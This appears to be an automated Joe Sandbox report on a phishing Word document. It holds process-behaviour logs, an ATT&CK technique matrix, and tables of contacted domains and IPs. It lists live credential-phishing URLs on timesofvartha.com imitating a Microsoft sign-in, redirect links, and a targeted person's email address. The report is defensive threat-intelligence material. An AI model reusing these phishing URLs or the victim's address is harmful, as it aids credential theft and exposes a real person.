    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AE1800000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AF9800000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AE15A0000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AE15C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AFCD30000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeMemory allocated: 25AFCDF0000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Virtualization/Sandbox Evasion
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Web Protocols
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    1
    Process Injection
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCron1
    DLL Side-Loading
    Login Hook1
    DLL Side-Loading
    NTDS12
    System Information Discovery
    Distributed Component Object ModelInput Capture4
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging5
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://timesofvartha.com/favicon.ico100%Avira URL Cloudmalware
    https://timesofvartha.com/cloudflare-challenge/100%Avira URL Cloudmalware
    https://sepedatua.com/158983/secure-redirect/0%Avira URL Cloudsafe
    https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/100%Avira URL Cloudmalware
    https://bc1qv5p8dwc98n3judrczkmpkjz.com/api/v3/auth0%Avira URL Cloudsafe
    https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/100%Avira URL Cloudmalware
    https://bc1qcr8muz00d2v7uqg5ggulrmm.com/api/v3/auth0%Avira URL Cloudsafe
    https://timesofvartha.com/cloudflare-challenge/#100%Avira URL Cloudmalware
    https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#100%Avira URL Cloudmalware
    https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect0%Avira URL Cloudsafe
    https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4100%Avira URL Cloudmalware
    https://sepedatua.com/158983/secure-redirect0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    s-part-0016.t-0009.t-msedge.net
    13.107.246.44
    truefalse
      high
      sepedatua.com
      103.134.152.12
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          bc1qcr8muz00d2v7uqg5ggulrmm.com
          188.114.96.3
          truefalse
            high
            r.neurotags.net
            34.168.114.70
            truefalse
              high
              bc1qv5p8dwc98n3judrczkmpkjz.com
              188.114.97.3
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  timesofvartha.com
                  208.91.198.81
                  truetrue
                    unknown
                    challenges.cloudflare.com
                    104.18.95.41
                    truefalse
                      high
                      sni1gl.wpc.omegacdn.net
                      152.199.21.175
                      truefalse
                        high
                        www.google.com
                        142.250.186.164
                        truefalse
                          high
                          bc1qlpk73pgj3dz02nq8d9kpdxk.org
                          154.216.17.193
                          truefalse
                            high
                            s-part-0032.t-0009.t-msedge.net
                            13.107.246.60
                            truefalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                ajax.aspnetcdn.com
                                unknown
                                unknownfalse
                                  high
                                  passwordreset.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://bc1qcr8muz00d2v7uqg5ggulrmm.com/api/v3/authfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.jsfalse
                                      high
                                      https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comtrue
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/false
                                          high
                                          https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/false
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                            high
                                            https://timesofvartha.com/favicon.icofalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                              high
                                              https://a.nel.cloudflare.com/report/v4?s=DPuBwHkrbUzOURU2nDSpeticQUuCzdy4a1kViVnWYmzGeTlJGGcyz9MfjL%2FNE6bZY%2Bkdoa8FwBjnxePw9uMGIhd%2FH%2FPAS54zLgrkE9%2FSwoTwd7UdAlIqo845m%2FB%2B7u%2FtJv6pwmiH%2FkA5e4Gz042TA5B3false
                                                high
                                                https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirectfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://timesofvartha.com/cloudflare-challenge/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNUfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                    high
                                                    https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/false
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://bc1qv5p8dwc98n3judrczkmpkjz.com/api/v3/authfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://a.nel.cloudflare.com/report/v4?s=lJPJ1XU8p1%2FA3q2X1NQ8JsdII8OY3AVBqFMc19hM5ykp7KbUH4j5nzoiMgmWsaaktm8p2ZLb3I2qK6i7guV%2BtpcLiwYveLwgBWTZHN5LmDVlnDrSFprDZEVCQ2PgVJn0XbsY%2BBZ7r8guoyuhsdBZGlqmfalse
                                                      high
                                                      https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.jsfalse
                                                        high
                                                        https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.cssfalse
                                                          high
                                                          https://a.nel.cloudflare.com/report/v4?s=gDw%2B4BaRNj6fLDMnBJQh0DVuOZKsI6KZ2nJqJT03lEq4CAgXbGqP4IwTrh6Ut2Y940uAcjvtuZIcanZpU5zE%2BfxmX6iRaZ92ritWkcDsYgt54diMjH6mLCky2SxjUg%2FKCf8VZd4QwFc6kJFsAPze9CN6false
                                                            high
                                                            https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svgfalse
                                                              high
                                                              https://sepedatua.com/158983/secure-redirect/false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Drfalse
                                                                high
                                                                https://timesofvartha.com/cloudflare-challenge/#Mrettinger@dcndx.comfalse
                                                                  unknown
                                                                  https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4false
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=autofalse
                                                                    high
                                                                    https://a.nel.cloudflare.com/report/v4?s=J2C4pKO6cnPbHRruGHOZNcQA0VyqEiD%2Bt3nCfdaIscfNbn6pFRuEKBjZeL2WFFM51NtMomseZEz4%2Bdwlsc%2BO81oCgFXClsXY0OvqiDFWGABZgLIS%2BtY0bigb1RWBri%2BwwW7zHQr3aS69RUR%2FWddR2slUfalse
                                                                      high
                                                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                                        high
                                                                        https://sepedatua.com/158983/secure-redirecttrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        http://cdn.jsinit.directfwd.com/sk-jspark_init.phpchromecache_285.13.drfalse
                                                                          high
                                                                          https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#chromecache_280.13.drfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://timesofvartha.com/cloudflare-challenge/#chromecache_283.13.drfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          13.107.246.44
                                                                          s-part-0016.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          104.18.94.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          13.107.246.60
                                                                          s-part-0032.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          154.216.17.193
                                                                          bc1qlpk73pgj3dz02nq8d9kpdxk.orgSeychelles
                                                                          135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                          208.91.198.81
                                                                          timesofvartha.comUnited States
                                                                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.17.24.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.18.95.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          188.114.97.3
                                                                          bc1qv5p8dwc98n3judrczkmpkjz.comEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          34.168.114.70
                                                                          r.neurotags.netUnited States
                                                                          2686ATGS-MMD-ASUSfalse
                                                                          188.114.96.3
                                                                          bc1qcr8muz00d2v7uqg5ggulrmm.comEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          142.250.186.164
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          152.199.21.175
                                                                          sni1gl.wpc.omegacdn.netUnited States
                                                                          15133EDGECASTUSfalse
                                                                          103.134.152.12
                                                                          sepedatua.comSingapore
                                                                          138608CLOUDHOST-AS-APCloudHostPteLtdSGfalse
                                                                          IP
                                                                          192.168.2.17
                                                                          192.168.2.16
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1557885
                                                                          Start date and time:2024-11-18 17:54:48 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 38s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:26
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
                                                                          Detection:MAL
                                                                          Classification:mal72.phis.winDOCX@22/280@49/17
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .docx
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, TextInputHost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.89.19, 52.113.194.132, 2.22.50.131, 2.22.50.144, 192.229.221.95, 13.89.179.8, 184.28.90.27, 52.109.32.38, 52.109.32.46, 52.109.32.47, 52.109.32.39, 172.217.18.14, 216.58.206.67, 64.233.184.84, 34.104.35.123, 52.111.231.25, 52.111.231.26, 52.111.231.23, 52.111.231.24, 52.111.236.34, 52.111.236.32, 52.111.236.33, 52.111.236.35, 142.250.185.74, 142.250.181.234, 172.217.16.202, 142.250.186.74, 216.58.212.170, 172.217.18.10, 216.58.206.74, 142.250.184.234, 142.250.74.202, 142.250.184.202, 216.58.212.138, 142.250.186.138, 216.58.206.42, 142.250.186.106, 142.250.186.42, 172.217.18.106, 95.101.111.179, 95.101.111.168, 2.19.97.203, 2.19.97.171, 142.250.186.131, 23.212.88.34, 142.250.186.110, 40.126.32.6, 40.126.32.131, 40.126.32.66, 40.126.32.129, 152.199.19.160, 20.190.177.0
